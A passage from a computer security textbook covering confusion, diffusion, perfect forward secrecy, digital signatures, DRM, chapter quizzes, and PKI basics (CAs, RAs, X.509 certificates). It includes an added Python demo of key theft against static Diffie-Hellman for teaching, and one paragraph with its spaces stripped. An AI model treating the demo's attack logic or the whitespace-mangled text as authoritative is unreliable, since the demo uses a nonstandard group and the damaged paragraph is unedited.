Confusion  Confusion is a principle that affects the randomness of an output. The concept is operationalized by ensuring that each bit of ciphertext depends on several parts of the key. Confusion obscures the relationship between the ciphertext and the key employed, so that statistical properties of the ciphertext reveal as little as possible about the key.

Diffusion  Diffusion is the principle that the statistical structure of the plaintext is dissipated across the ciphertext, rendering one structurally independent of the other. In plain terms, a change in one character of plaintext should result in changes to many characters of the ciphertext (ideally about half of its bits), so that changes in ciphertext do not reveal information about the structure of the plaintext.

Perfect Forward Secrecy  Perfect forward secrecy is a property of a key-agreement system in which the session keys derived for a session are not compromised even if the long-term keys that authenticated the exchange are compromised in the future. This is especially important in session key generation: if perfect forward secrecy were not in place, an attacker who recorded past encrypted sessions and later obtained the long-term private key could decrypt everything that had been recorded. With ephemeral keys, the session secret is erased when the session ends, so there is nothing for a later compromise to recover.
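The following added example (not from the book) puts the ephemeral-key and perfect-forward-secrecy discussion above side by side in code: the same Diffie-Hellman arithmetic run once with long-term keys reused for every session, and once with a fresh key pair per session. An attacker who recorded the public shares and later steals Alice's long-term private exponent recovers every session key in the first case and none in the second. The group is an assumption made for the demo: the Mersenne prime 2**521 - 1 with generator 3 is prime, so the arithmetic is valid, but it is not a standardized DH group; real systems use RFC 7919 groups or X25519 from a vetted library.

```python
"""Static versus ephemeral Diffie-Hellman: what perfect forward secrecy buys.

Added example, not from the book. Demo group only (Mersenne prime M521,
generator 3); not a standardized group, do not reuse in real systems.
"""
import hashlib
import secrets

P = 2**521 - 1   # Mersenne prime M521; assumed demo modulus
G = 3            # assumed demo generator


def dh_keypair() -> tuple[int, int]:
    """Return (private exponent x, public share g^x mod p)."""
    x = secrets.randbelow(P - 2) + 2
    return x, pow(G, x, P)


def dh_secret(peer_public: int, private: int) -> int:
    """Shared secret g^(xy) mod p computed from the peer's public share."""
    return pow(peer_public, private, P)


def session_key(secret: int) -> bytes:
    """Derive a symmetric session key from the shared secret (P fits in 66 bytes)."""
    return hashlib.sha256(secret.to_bytes(66, "big")).digest()


def run_session(a_priv: int, a_pub: int, b_priv: int, b_pub: int) -> bytes:
    """Both parties derive the key from the other's share; returns it after checking they agree."""
    k_alice = session_key(dh_secret(b_pub, a_priv))
    k_bob = session_key(dh_secret(a_pub, b_priv))
    assert k_alice == k_bob
    return k_alice


def static_sessions(n: int, long_a: tuple[int, int], long_b: tuple[int, int]):
    """Static DH: long-term key pairs are reused as the DH shares in every session.

    Returns (recorded public shares per session, session keys). The attacker
    on the wire sees only the public shares.
    """
    (a_priv, a_pub), (b_priv, b_pub) = long_a, long_b
    transcript = [(a_pub, b_pub)] * n
    keys = [run_session(a_priv, a_pub, b_priv, b_pub) for _ in range(n)]
    return transcript, keys


def ephemeral_sessions(n: int):
    """EDH: a fresh key pair per session. Long-term keys would only sign the
    shares (signing omitted here) and never enter the key derivation; the
    private exponents go out of scope after use, so nothing survives the session."""
    transcript, keys = [], []
    for _ in range(n):
        a_priv, a_pub = dh_keypair()
        b_priv, b_pub = dh_keypair()
        keys.append(run_session(a_priv, a_pub, b_priv, b_pub))
        transcript.append((a_pub, b_pub))
    return transcript, keys


def attacker_replay(leaked_priv: int, transcript) -> list[bytes]:
    """Attacker who later steals Alice's long-term private exponent reprocesses
    every recorded exchange with it, hoping to recover the session keys."""
    return [session_key(dh_secret(b_pub, leaked_priv)) for _, b_pub in transcript]


if __name__ == "__main__":
    alice_long, bob_long = dh_keypair(), dh_keypair()
    t, keys = static_sessions(3, alice_long, bob_long)
    print("static DH, sessions recovered after key theft:",
          sum(g == k for g, k in zip(attacker_replay(alice_long[0], t), keys)))
    t, keys = ephemeral_sessions(3)
    print("ephemeral DH, sessions recovered after key theft:",
          sum(g == k for g, k in zip(attacker_replay(alice_long[0], t), keys)))
```

With static keys all three sessions share one key and the leaked exponent unlocks all of them; with ephemeral keys each session has a distinct key and the leaked long-term exponent recovers nothing, which is exactly the property TLS cipher suites with DHE/ECDHE provide.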
Transport Encryption  Transport encryption is used to protect data that is in motion. When data is being transported across a network, it is at risk of interception. An examination of the OSI networking model shows a layer dedicated to transport, and this abstraction can be used to manage end-to-end cryptographic functions for a communication channel. Over TCP/IP, TLS, which sits between the application and TCP, is the preferred method of securing the channel at this level.

Digital Signatures  Digital signatures have been touted as the key to truly paperless document flow, and they do have promise for improving the system. Digital signatures are based on both hashing functions and asymmetric cryptography, and both play an important role in signing digital documents. Unprotected digital documents are very easy for anyone to change. If a document is edited after an individual signs it, it is important that any modification can be detected. To protect against document editing, hashing functions are used to create a digest of the message that is unique to its contents and easily reproducible by both parties. This is how message integrity is assured.

Digital signatures provide a means of verifying the authenticity and integrity of a message: you know both who the sender is and that the message has not been altered. By itself, a digital signature does not protect the contents from unauthorized reading.

A digital signature is a cryptographic implementation designed to demonstrate authenticity and identity associated with a message. Using public key cryptography, a digital signature allows traceability to the person signing the message through the use of their private key. The addition of hash codes allows for assurance of the integrity of the message as well. The operation of a digital signature is a combination of cryptographic elements to achieve a desired outcome. The steps involved in digital signature generation and use are illustrated in Figure 5.11. The message to be signed is hashed, and the hash is signed (in RSA terms, encrypted) using the sender's private key. Upon receipt, the recipient recovers the hash using the sender's public key. If a fresh hash of the received message matches the recovered value, two things are known: first, the message has not been altered; second, the signer possessed the private key of the named sender, so is presumably the sender. In practice the hash is not signed raw: schemes such as RSA-PSS or PKCS#1 v1.5 pad and encode it first, and the verifier checks that encoding as well.

• Figure 5.11  Digital signature operation

A digital signature does not by itself protect the contents of the message from interception. The message is still sent in the clear, so if confidentiality of the message is a requirement, additional steps must be taken to secure the message from eavesdropping. This can be done by encrypting the message itself, or by encrypting the channel over which it is transmitted.
Digital Rights Management  Digital rights management (DRM) is the process for protecting intellectual property from unauthorized use. This is a broad area, but the most concentrated focus is on preventing piracy of software or digital content. Before easy access to computers, or the "digital revolution," the content we came in contact with was analog or print based. While it was possible to copy this content, it was difficult and time-consuming to do so, and usually resulted in a loss of quality. It was also much more difficult to send 1000 pages of a handwritten copy of a book to Europe, for example. Computers and the Internet have made such tasks trivial, and now it is very easy to copy a document, music, or video and quickly send it thousands of miles away. Cryptography has entered the fray as a solution to protect digital rights, though it is currently better known for its failures than its successes. The DVD Content Scramble System (CSS) was an attempt to make DVDs impossible to copy by computer. CSS used an encryption algorithm that was licensed to every DVD player; however, creative programmers were able to retrieve the key to this algorithm by disassembling a software-based DVD player. CSS has been replaced by the Advanced Access Content System (AACS), which is used on Blu-ray discs. This system encrypts video content with the symmetric AES algorithm using one or more keys. Several decryption keys have been cracked and released to the Internet, allowing pirates to freely copy the protected content. The music and computer game industries have also attempted several different DRM applications, but nearly all of these have eventually been cracked, allowing piracy.

A common example of DRM that is mostly successful is the broadcast stream of digital satellite TV. Since the signal is beamed from space to every home in North America, the satellite TV provider must be able to protect the signal so that it can charge people to receive it. Smart cards are employed to securely hold the decryption keys that allow access to some or all of the content in the stream. This system has been cracked several times, allowing a subset of users free access to the content; however, the satellite TV providers learned from their early mistakes and upgraded new smart cards to correct the old problems.

DRM will also become very important in the industry of Software as a Service (SaaS). Similar to companies that provide satellite TV service, companies that provide SaaS rely on a subscription basis for profitability. If someone could pay for a single license and then distribute that to hundreds of employees, the provider would soon go out of business. Many systems in the past have been cracked because the key was housed inside the software, where anyone with a disassembler could find it. This has prompted some systems to use specific hardware to store and protect the key. These devices are commonly known as Hardware Security Modules, or HSMs. They are usually designed to protect the key in hardware so that even if the device is tampered with, it will not reveal key material. Smart cards are one example of this technology. Another example is hardware token USB keys that must be inserted into the machine for the software to decrypt and run. Placing the keys in hardware makes an attack to retrieve them much harder, a concept that is also employed in the Trusted Platform Module (TPM); in fact, one of the primary complaints raised against the TPM when it was introduced was that it could be used to enforce DRM restrictions on the owner's own machine.
Cryptographic Applications

A few applications can be used to encrypt data conveniently on your personal computer. (This is by no means a complete list of every application.) Pretty Good Privacy (PGP) is mentioned in this book because it is a useful protocol suite. Created by Philip Zimmermann in 1991, it passed through several versions that were available for free under a noncommercial license. PGP is now an enterprise encryption product, acquired by the Symantec Corporation in 2010. PGP can be applied to popular e-mail programs to handle the majority of day-to-day encryption tasks using a combination of symmetric and asymmetric encryption protocols. One of the defining features of PGP is its hybrid use of both symmetric and asymmetric encryption, drawing on the strengths of each method and avoiding the weaknesses of each. Symmetric keys are used for bulk encryption, taking advantage of the speed and efficiency of symmetric encryption. The symmetric keys are themselves encrypted to the recipient's public key and passed using asymmetric methods, capitalizing on the flexibility of that method. PGP-based technology is now sold as part of a commercial application, with home and corporate versions.

Cross Check  PGP  In Chapter 7 you will learn some additional details about PGP. Why is the ability to use asymmetric and symmetric encryption in the same program important?

GnuPG, or Gnu Privacy Guard, is an open source implementation of the OpenPGP standard. This command line-based tool is a public key encryption program designed to protect electronic communications such as e-mail. It operates similarly to PGP and includes a method for managing public/private keys.

File system encryption is becoming a standard means of protecting data while in storage. Even hard drives are available with built-in AES encryption. Microsoft expanded its Encrypting File System (EFS), available since the Windows 2000 operating system, with BitLocker, a full-volume encryption method introduced with the Windows Vista operating system. BitLocker is also used in Windows Server 2008 and in Windows 7 and later. BitLocker uses AES to encrypt the entire volume, so every file on the drive is protected automatically. All encryption occurs in the background, and decryption occurs seamlessly when data is requested. The key that unlocks the volume can be protected by the TPM, by a USB key, or by both, optionally combined with a PIN.

Database Encryption  Due partly to increased regulatory concerns and partly to more targeted attacks, databases have begun to offer native support for encryption. Protecting data at rest in the enterprise frequently involves data stored in databases. Building data protection mechanisms into the database systems is not new (it has been around for a long time), but enterprise adoption of this functionality has been slow. Symmetric encryption algorithms such as 3DES and AES are used to encrypt data internally in the database. Protection mechanisms that can be managed by row and by column are included in most major database products; the challenge is in convincing organizations to use this proven protection methodology. It does add complexity to the system, particularly around key management, but in today's environment of data breaches and corporate espionage, the complexity is easier to manage than the effects of a data loss.

Use of Proven Technologies  When setting up a cryptographic scheme, it is important to use proven technologies. Proven cryptographic libraries and proven cryptographically secure random number generators are the foundational elements of a solid program. Homegrown or custom elements in these areas can greatly increase the risk of a broken system. Developing your own cryptographic algorithms is beyond the abilities of most groups. Algorithms are complex and difficult to create. Any algorithm that has not had public review can have weaknesses in the algorithm. Most good algorithms are approved for use only after a lengthy test and public review phase.
Chapter 5 Review

For More Information
Applied Cryptography, Second Edition, Bruce Schneier (John Wiley & Sons)
Cryptool: https://www.cryptool.org/en/
Bruce Schneier Blog: https://www.schneier.com/cryptography.html

Lab Book Exercises  The following lab exercises from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provide practical application of material covered in this chapter:

Chapter Summary  After reading this chapter and completing the exercises, you should understand the following about cryptography.

Understand the fundamentals of cryptography
Understand the fundamental methods.
Understand how to compare strengths and performance of algorithms.
Have an appreciation of the historical aspects of cryptography.

Identify and describe the three types of cryptography
Symmetric cryptography is based upon the concept of a shared secret or key.
Asymmetric cryptography is based upon a key that can be made openly available to the public, yet still provide security.
One-way, or hashing, cryptography takes data and enciphers it. However, there is no way to decipher it and no key.
Proper random number generation is essential for cryptographic use, as the strength of the implementation frequently depends upon it being truly random and unknown.

List and describe current cryptographic algorithms
Hashing is the use of a one-way function to generate a message summary for data integrity.
Hashing algorithms include SHA (Secure Hash Algorithm) and MD (Message Digest).
Symmetric encryption is a shared secret form of encrypting data for confidentiality; it is fast and reliable, but needs secure key management.
Symmetric algorithms include DES (Data Encryption Standard), 3DES, AES (Advanced Encryption Standard), CAST, Blowfish, IDEA, and RC (Rivest Cipher) variants.
Asymmetric encryption is a public/private key-pair encryption used for authentication, nonrepudiation, and confidentiality.
Asymmetric algorithms include RSA, Diffie-Hellman, ElGamal, and ECC.
Explain how cryptography is applied for security
Confidentiality is gained because encryption is very good at scrambling information to make it look like random noise, when in fact a key can decipher the message and return it to its original state.
Integrity is gained because hashing algorithms are specifically designed to check integrity. They reduce a message to a mathematical value that can be independently calculated, so that any alteration of the message changes that value.
Nonrepudiation is the property of not being able to claim that you did not send the data. This property is gained because of the properties of private keys.
Authentication, or being able to prove you are you, is achieved through the private keys involved in digital signatures.
Key generation methods, including ephemeral keys and key stretching, are important tools in the implementation of strong cryptosystems.
Digital signatures, combining hashing and asymmetric encryption, provide an authentication method that anyone holding the signer's public key can verify, allowing you to use them much as you would a handwritten signature on a document.
Digital rights management (DRM) uses some form of encryption that allows an application to determine whether you are an authorized user of the digital content you are trying to access. For example, DVDs (CSS) and Blu-ray discs (AACS) use DRM.
The principle of perfect forward secrecy protects previously recorded sessions from a later disclosure of the long-term keys.
Proven cryptographic technologies are important, as most cryptographic systems fail and only a few stand the test of time. Homebrew systems are ripe for failure.
Cipher suites provide information to assist developers in choosing the correct methods to achieve desired levels of protection.
Key Terms  algorithm, block cipher, ciphertext, collision attack, confusion, cryptanalysis, cryptography, differential cryptanalysis, diffusion, digital rights management, digital signature, entropy, ephemeral keys, exclusive OR (XOR), hash, key, key escrow, key management, keyspace, key stretching, linear cryptanalysis, multiple encryption, perfect forward secrecy, plaintext, shared secret, shift cipher, steganography, stream cipher, substitution, transposition, transposition cipher, trapdoor function, Vigenère cipher
Key Terms Quiz  Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.
1. Making two inputs result in the exact same cryptographic hash is called a(n) _______________.
2. A simple way to hide information, the _______________ moves a letter a set number of places down the alphabet.
3. To provide for perfect forward secrecy, one should use _______________.
4. _______________ is required for symmetric encryption.
5. _______________ is the evaluation of a cryptosystem to test its security.
6. _______________ refers to every possible value for a cryptographic key.
7. _______________ is the function most commonly seen in cryptography, a "bitwise exclusive" or.
8. The measure of randomness in a data stream is called _______________.
9. Processing through an algorithm more than once with different keys is called _______________.
10. The basis for symmetric cryptography is the principle of a(n) _______________.
Multiple-Choice Quiz
1. When a message is sent, no matter what its format, why do we care about its integrity?
A. To ensure proper formatting
B. To show that the encryption keys are undamaged
C. To show that the message has not been edited in transit
D. To show that no one has viewed the message
2. How is 3DES different from many other types of encryption described in this chapter?
A. It only encrypts the hash.
B. It hashes the message before encryption.
C. It uses three keys and multiple encryption and/or decryption sets.
D. It can display the key publicly.
3. If a message has a hash, how does the hash protect the message in transit?
A. If the message is edited, the hash will no longer match.
B. Hashing destroys the message so that it cannot be read by anyone.
C. Hashing encrypts the message so that only the private key holder can read it.
D. The hash makes the message uneditable.
4. What is the biggest drawback to symmetric encryption?
A. It is too easily broken.
B. It is too slow to be easily used on mobile devices.
C. It requires a key to be securely shared.
D. It is available only on UNIX.
5. What is Diffie-Hellman most commonly used for?
A. Symmetric encryption key exchange
B. Signing digital contracts
C. Secure e-mail
D. Storing encrypted passwords
6. What is public key cryptography a more common name for?
A. Asymmetric encryption
B. SHA
C. Symmetric encryption
D. Hashing
7. What algorithm can be used to provide for key stretching?
A. PBKDF2
B. SHA-256
C. RIPEMD
D. 3DES
8. A good hash function is resistant to what?
A. Brute-forcing
B. Rainbow tables
C. Interception
D. Collisions
9. How is 3DES an improvement over normal DES?
A. It uses public and private keys.
B. It hashes the message before encryption.
C. It uses three keys and multiple encryption and/or decryption sets.
D. It is faster than DES.
10. What is the best kind of key to have?
A. Easy to remember
B. Long and random
C. Long and predictable
D. Short

Essay Quiz
1. Describe how polyalphabetic substitution works.
2. Explain why asymmetric encryption is called public key encryption.
3. Describe cryptanalysis.

Lab Projects
• Lab Project 5.1  Using a utility program, demonstrate how single character changes can make substantial changes to hash values.
• Lab Project 5.2  Create a key set and use it to transfer a file securely.
Chapter 6  Public Key Infrastructure
Without trust, there is nothing.
—ANONYMOUS
In this chapter, you will learn how to
Implement the basics of public key infrastructures
Describe the role of registration authorities
Use digital certificates
Understand the lifecycle of certificates
Explain the relationship between trust and certificate verification
Describe the roles of certificate authorities and certificate repositories
Identify centralized and decentralized infrastructures
Describe public and in-house certificate authorities

Public key infrastructures (PKIs) are becoming a central security foundation for managing identity credentials in many companies. The technology manages the issue of binding public keys and identities across multiple applications. The other approach, without PKIs, is to implement many different security solutions and hope for interoperability and equal levels of protection. PKIs comprise several components, including certificates, registration and certificate authorities, and a standard process for verification. PKIs are about managing the sharing of trust and using a third party to vouch for the trustworthiness of a claim of ownership over a credential document, called a certificate.

The Basics of Public Key Infrastructures  A public key infrastructure (PKI) provides all the components necessary for different types of users and entities to be able to communicate securely and in a predictable manner. A PKI is made up of hardware, applications, policies, services, programming interfaces, cryptographic algorithms, protocols, users, and utilities. These components work together to allow communication to take place using public key cryptography and symmetric keys for digital signatures, data encryption, and integrity.
Cross Check  PKIs and Encryption  The technologies used in PKI include many cryptographic algorithms and mechanisms. Encryption technologies and public key principles were covered in Chapter 5. A basic understanding of public and private keys and their relationship to public key encryption is a prerequisite for this chapter. If needed, review that material before you attempt the details of PKI in this chapter.

Although many different applications and protocols can provide the same type of functionality, constructing and implementing a PKI boils down to establishing a level of trust. If, for example, John and Diane want to communicate securely, John can generate his own public/private key pair and send his public key to Diane, or he can place his public key in a directory that is available to everyone. If Diane receives John's public key, either from him or from a public directory, how does she know the key really came from John? Maybe another individual, Katie, is masquerading as John and has replaced John's public key with her own, as shown in Figure 6.1 (referred to as a man-in-the-middle attack). If this took place, Diane would believe that her messages could be read only by John and that the replies were actually from him. However, she would actually be communicating with Katie. What is needed is a way to verify an individual's identity, to ensure that a person's public key is bound to their identity and thus ensure that the previous scenario (and others) cannot take place.

• Figure 6.1  Without PKIs, individuals could spoof others' identities.

In PKI environments, entities called registration authorities (RAs) and certificate authorities (CAs) provide services similar to those of the Department of Motor Vehicles (DMV). When John goes to register for a driver's license, he has to prove his identity to the DMV by providing his passport, birth certificate, or other identification documentation. If the DMV is satisfied with the proof John provides (and John passes a driving test), the DMV will create a driver's license that can then be used by John to prove his identity. Whenever John needs to identify himself, he can show his driver's license. Although many people may not trust John to identify himself truthfully, they do trust the third party, the DMV. In the PKI context, while some variations exist in specific products, the RA will require proof of identity from the individual requesting a certificate and will validate this information. The RA will then advise the CA to generate a certificate, which is analogous to a driver's license. The CA will digitally sign the certificate using its private key. The use of the private key ensures to the recipient that the certificate came from the CA. When Diane receives John's certificate and verifies that it was actually digitally signed by a CA that she trusts, she will believe that the certificate is actually John's, not because she trusts John, but because she trusts the entity that is vouching for his identity (the CA).
Tech Tip

Public and Private Keys  Recall from Chapter 5 that the public key is the one that you give to others and the private key never leaves your possession. With RSA, anything one key does, the other undoes, so if you encrypt something with the public key, only the holder of the private key can decrypt it, and if you sign something with the private key, everyone who uses the public key knows that the holder of the private key produced it. (Other public key algorithms such as DSA and ECDSA sign and verify without encrypting anything, but the trust relationship is the same.) Certificates do not alter any of this; they only offer a standard means of transferring keys.

This is commonly referred to as a third-party trust model. Public keys are components of digital certificates, so when Diane verifies the CA's digital signature, this verifies that the certificate is truly John's and that the public key the certificate contains is also John's. This is how John's identity is bound to his public key. This process allows John to authenticate himself to Diane and others.

Using the third-party certificate, John can communicate with Diane, using public key encryption, without prior communication or a preexisting relationship. Once Diane is convinced of the legitimacy of John's public key, she can use it to encrypt messages between herself and John, as illustrated in Figure 6.2.

• Figure 6.2  Public keys are components of digital certificates.

Numerous applications and protocols can generate public/private key pairs and provide functionality similar to what a PKI provides, but no trusted third party is available for both of the communicating parties. For each party to choose to communicate this way without a third party vouching for the other's identity, the two must choose to trust each other and the communication channel they are using. In many situations, it is impractical and dangerous to arbitrarily trust an individual you do not know, and this is when the components of a PKI must fall into place: to provide the necessary level of trust you cannot, or choose not to, provide on your own.

Exam Tip: PKIs are composed of several elements:
• Certificates (containing keys)
• Certificate authorities (CAs)
• Registration authorities (RAs)
• Certificate revocation lists (CRLs)
• Trust models

What does the "infrastructure" in "public key infrastructure" really mean? An infrastructure provides a sustaining groundwork upon which other things can be built. So an infrastructure works at a low level to provide a predictable and uniform environment that allows other, higher-level technologies to work together through uniform access points. The environment that the infrastructure provides allows these higher-level applications to communicate with each other and gives them the underlying tools to carry out their tasks.
Certificate Authorities  A certificate authority (CA) is a trusted authority that certifies individuals' identities and creates electronic documents indicating that individuals are who they say they are. The electronic document is referred to as a digital certificate, and it establishes an association between the subject's identity and a public key. The private key that is paired with the public key in the certificate is stored separately.

As noted in Chapter 5, it is important to safeguard the private key. Typically, it should never leave the machine or device where it was created.

A CA is more than just a piece of software, however; it is actually made up of the software, hardware, procedures, policies, and people who are involved in validating individuals' identities and generating the certificates. This means that if one of these components is compromised, it can negatively affect the CA overall and can threaten the integrity of the certificates it produces.

Cross Check  Certificates Stored on a Client PC  Certificates are stored on user PCs. Chapter 17 covers the use of the Internet and associated materials, including the use of certificates by web browsers. Take a moment to explore the certificates stored on your PC by your browser. To understand the details behind how certificates are stored and managed, the reader is directed to the details in Chapter 17.

Every CA should have a certification practices statement (CPS) that outlines how identities are verified; the steps the CA follows to generate, maintain, and transmit certificates; and why the CA can be trusted to fulfill its responsibilities. The CPS describes how keys are secured, what data is placed within a digital certificate, and how revocations will be handled. If a company is going to use and depend on a public CA, the company's security officers, administrators, and legal department should review the CA's entire CPS to ensure that it will properly meet the company's needs, and to make sure that the level of security claimed by the CA is high enough for their use and environment. A critical aspect of a PKI is the trust between the users and the CA, so the CPS should be reviewed and understood to ensure that this level of trust is warranted.

The certificate server is the actual service that issues certificates based on the data provided during the initial registration process. The server constructs and populates the digital certificate with the necessary information and combines the user's public key with the resulting certificate. The certificate is then digitally signed with the CA's private key.

Tech Tip

Trusting CAs  The question of whether a CA can be trusted is part of the continuing debate on how much security PKIs actually provide. Overall, people put a lot of faith in CAs. The companies that provide CA services understand this and also understand that their business is based on their reputation. If a CA was compromised or did not follow through on its various responsibilities, word would get out and it would quickly lose customers and business. CAs work diligently to ensure that the reputation of their products and services remains good by implementing very secure facilities, methods, procedures, and personnel. But it is up to the company or individual to determine what degree of trust can actually be given and what level of risk is acceptable.
Registration Authorities  A registration authority (RA) is the PKI component that accepts a request for a digital certificate and performs the necessary steps of registering and authenticating the person requesting the certificate. The authentication requirements differ depending on the type of certificate being requested. Most CAs offer a series of classes of certificates with increasing trust by class. The specific classes are described in the upcoming Tech Tip sidebar, "Certificate Classes." Each higher class of certificate can carry out more powerful and critical tasks than the one below it. This is why the different classes have different requirements for proof of identity. If you want to receive a Class 1 certificate, you may only be asked to provide your name, e-mail address, and physical address. For a Class 2 certification, you may need to provide the RA with more data, such as your driver's license, passport, and company information, that can be verified. To obtain a Class 3 certificate, you will be asked to provide even more information and most likely will need to go to the RA's office for a face-to-face meeting. Each CA will outline the certification classes it provides and the identification requirements that must be met to acquire each type of certificate.

Tech Tip

Certificate Classes  The types of certificates available can vary between different CAs, but usually at least three different types are available, and they are referred to as classes:

Class 1  A Class 1 certificate is usually used to verify an individual's identity through e-mail. A person who receives a Class 1 certificate can use his public/private key pair to digitally sign e-mail and encrypt message contents.

Class 2  A Class 2 certificate can be used for software signing. A software vendor would register for this type of certificate so that it could digitally sign its software. This provides integrity for the software after it is developed and released, and it allows the receiver of the software to verify from where the software actually came.

Class 3  A Class 3 certificate can be used by a company to set up its own CA, which will allow it to carry out its own identification verification and generate certificates internally.

In most situations, when a user requests a Class 1 certificate, the registration process will require the user to enter specific information into a web-based form. The web page will have a section that accepts the user's public key, or it will step the user through creating a public/private key pair, which will allow the user to choose the size of the keys to be created. Once these steps have been completed, the public key is attached to the certificate registration form and both are forwarded to the RA for processing. The RA is responsible only for the registration process and cannot actually generate a certificate. Once the RA is finished processing the request and verifying the individual's identity, the RA sends the request to the CA. The CA uses the RA-provided information to generate a digital certificate, integrates the necessary data into the certificate fields (user identification information, public key, validity dates, proper use for the key and certificate, and so on), and sends a copy of the certificate to the user. These steps are shown in Figure 6.3. The certificate may also be posted to a publicly accessible directory so that others can access it.

• Figure 6.3  Steps for obtaining a digital certificate

Note that a 1:1 correspondence does not necessarily exist between identities and certificates. An entity can have multiple key pairs, using separate public keys for separate purposes. Thus, an entity can have multiple certificates, each attesting to separate public key ownership. It is also possible to have different classes of certificates, again with different keys. This flexibility allows entities total discretion in how they manage their keys, and the PKI manages the complexity by using a unified process that allows key verification through a common interface.

If an application creates a key store that can be accessed by other applications, it will provide a standardized interface, called the application programming interface (API). As an example, Figure 6.4 shows that application A went through the process of registering a certificate and generating a key pair. It created a key store that provides an interface to allow other applications to communicate with it and use the items held within the store. The local key store is just one location where these items can be held. Often the digital certificate and public key are also stored in a certificate repository (as discussed in the "Certificate Repositories" section of this chapter) so that it is available to a subset of individuals.

• Figure 6.4  Some key stores can be shared by different applications.

Exam Tip: The RA verifies the identity of the certificate requestor on behalf of the CA. The CA generates the certificate using information forwarded by the RA.

Local Registration Authorities  A local registration authority (LRA) performs the same functions as an RA, but the LRA is closer to the end users. This component is usually implemented in companies that have their own internal PKIs and have distributed sites. Each site has users that need RA services, so instead of requiring them to communicate with one central RA, each site can have its own LRA. This reduces the amount of traffic that would be created by several users making requests across wide area network (WAN) lines. The LRA performs identification, verification, and registration functions. It then sends the request, along with the user's public key, to a centralized CA so that the certificate can be generated. It acts as an interface between the users and the CA. LRAs simplify the RA/CA process for entities that desire certificates only for in-house use.

Tech Tip

Sharing Key Stores  Different applications from the same vendor may share key stores. Microsoft applications keep user keys and certificates in a Registry entry within that user's profile. The applications can then save and retrieve them from this single location or key store. Other applications could also use the same keys if they knew where they were stored by using Registry API calls.
DigitalCertificatesAdigitalcertificatebindsanindividual’sidentitytoapublickey,anditcontainsalltheinformationareceiverneedstobeassuredoftheidentityofthepublickeyowner.AfteranRAverifiesanindividual’sidentity,theCAgeneratesthedigitalcertificate,buthowdoestheCAknowwhattypeofdatatoinsertintothecertificate?ThecertificatesarecreatedandformattedbasedontheX.509standard,
whichoutlinesthenecessaryfieldsofacertificateandthepossiblevaluesthatcanbeinsertedintothefields.Asofthiswriting,X.509version3isthemostcurrentversionofthestandard.X.509isastandardoftheInternationalTelecommunicationUnion(www.itu.int).TheIETF’sPublic
KeyInfrastructure(X.509),orPKIX,workinggrouphasadaptedtheX.509standardtothemoreflexibleorganizationoftheInternet,asspecifiedinRFC5280,andiscommonlyreferredtoasPKIXforPublicKeyInfrastructureX.509.Table6.1listsanddescribesthefieldsinanX.509certificate.
Table 6.1 X.509 Certificate Fields
Figure 6.5 shows the actual values of the different certificate fields for a particular certificate in Internet Explorer. The version of this certificate is V3 (X.509 v3) and the serial number is also listed; this number is unique for each certificate that is created by a specific CA. The CA used the MD5 hashing algorithm to create the message digest value and then signed it using the CA's private key using the RSA algorithm. (MD5 appears here only because this particular certificate dates from a period when it was still accepted; MD5-signed certificates are no longer trusted by current browsers, and a practitioner should expect to see SHA-256 with RSA or ECDSA instead.) The actual CA that issued the certificate is Root SGC Authority, and the valid dates indicate how long this certificate is valid. The subject is MS SGC Authority, which is the entity that registered this certificate and that is bound to the embedded public key. The actual public key is shown in the lower window and is represented in hexadecimal.
• Figure 6.5 Fields within a digital certificate
The subject of a certificate is commonly a person, but it does not have to be. The subject can also be a network device (router, web server, firewall, and so on), an application, a department, or a company. Each has its own identity that needs to be verified and proven to another entity before secure, trusted communication can be initiated. If a network device is using a certificate for authentication, the certificate may contain the identity of that device. This allows a user of the device to verify its authenticity based on the signed certificate and trust in the signing authority. This trust can be transferred to the identity of the device, indicating authenticity.
Tech Tip
X.509 Digital Certificate Extensions
Following are some key examples of the values that can be set in a certificate's Key Usage extension. Each value states what the certified public key may be used for:

Digital Signature    The key is used to verify a digital signature.
Key Encipherment    The key is used to encrypt other keys used for secure key distribution.
Data Encipherment    The key is used to encrypt data; it cannot be used to encrypt other keys.
CRL Sign    The key is used to verify a CA signature on a CRL.
Key Cert Sign    The key is used to verify CA signatures on certificates.
Non Repudiation    The key is used when a nonrepudiation service is being provided.
Certificate Extensions
Certificate extensions allow for further information to be inserted within the certificate, which can be used to provide more functionality in a PKI implementation. Certificate extensions can be standard or private. Standard certificate extensions are defined by the standard and implemented for every PKI implementation. Private certificate extensions are defined for specific organizations (or domains within one organization), and they allow companies to further define different, specific uses for digital certificates to best fit their business needs.

Several different extensions can be implemented, one being key usage extensions, which dictate how the public key that is held within the certificate can be used. Remember that public keys can be used for different functions: encrypting symmetric keys for distribution (key encipherment), encrypting data directly, verifying digital signatures, and more.

A nonrepudiation service can be provided by a third-party notary. In this situation, the sender's digital signature is verified and then signed by the notary so that the sender cannot later deny signing and sending the message. This is basically the same function performed by a traditional notary using paper: validate the sender's identity and validate the time and date of an item being signed and sent. This is required when the receiver needs to be really sure of the sender's identity and wants to be legally protected against possible fraud or forgery.

If a company needs to be sure that accountable nonrepudiation services will be provided, a trusted time source needs to be used, which can be a trusted third party called a timestamp authority (TSA). Using a trusted time source gives users a higher level of confidence as to when specific messages were digitally signed. For example, suppose Barry sends Ron a message and digitally signs it, and Ron later civilly sues Barry over a dispute. This digitally signed message may be submitted by Ron as evidence pertaining to an earlier agreement that Barry now is not fulfilling. If a trusted time source was not used in their PKI environment, Barry could claim that his private key had been compromised before that message was sent. If a trusted time source was implemented, then it could be shown that the message was signed before the date on which Barry claims his key was compromised. If a trusted time source is not used, no activity that was carried out within a PKI environment can be truly proven, because it is so easy to change system and software time settings.
Tech Tip
Critical Flag and Certificate Usage
When an extension is marked as critical, it means that the CA is certifying the key for only that specific purpose. If Joe receives a certificate with a Digital Signature key usage extension and the critical flag is set, Joe can use the public key within that certificate only to validate digital signatures, and no more. If the extension was marked as noncritical, the key can be used for purposes outside of those listed in the extension, so in this case it is up to Joe (and his applications) to decide how the key will be used. Note that RFC 5280 recommends that CAs mark Key Usage as critical, and common validation libraries enforce the key-usage bits either way, so do not expect a noncritical flag to loosen what a key may be used for.

Critical and Noncritical Extensions
Certificate extensions are considered either critical or noncritical, which is indicated by a specific flag within the certificate itself. When this flag is set to critical, it means that the extension must be understood and processed by the receiver. If the receiver is not configured to understand a particular extension marked as critical, and thus cannot process it properly, the certificate cannot be used for its proposed purpose. If the flag does not indicate that the extension is critical, the certificate can be used for the intended purpose, even if the receiver does not process the appended extension.
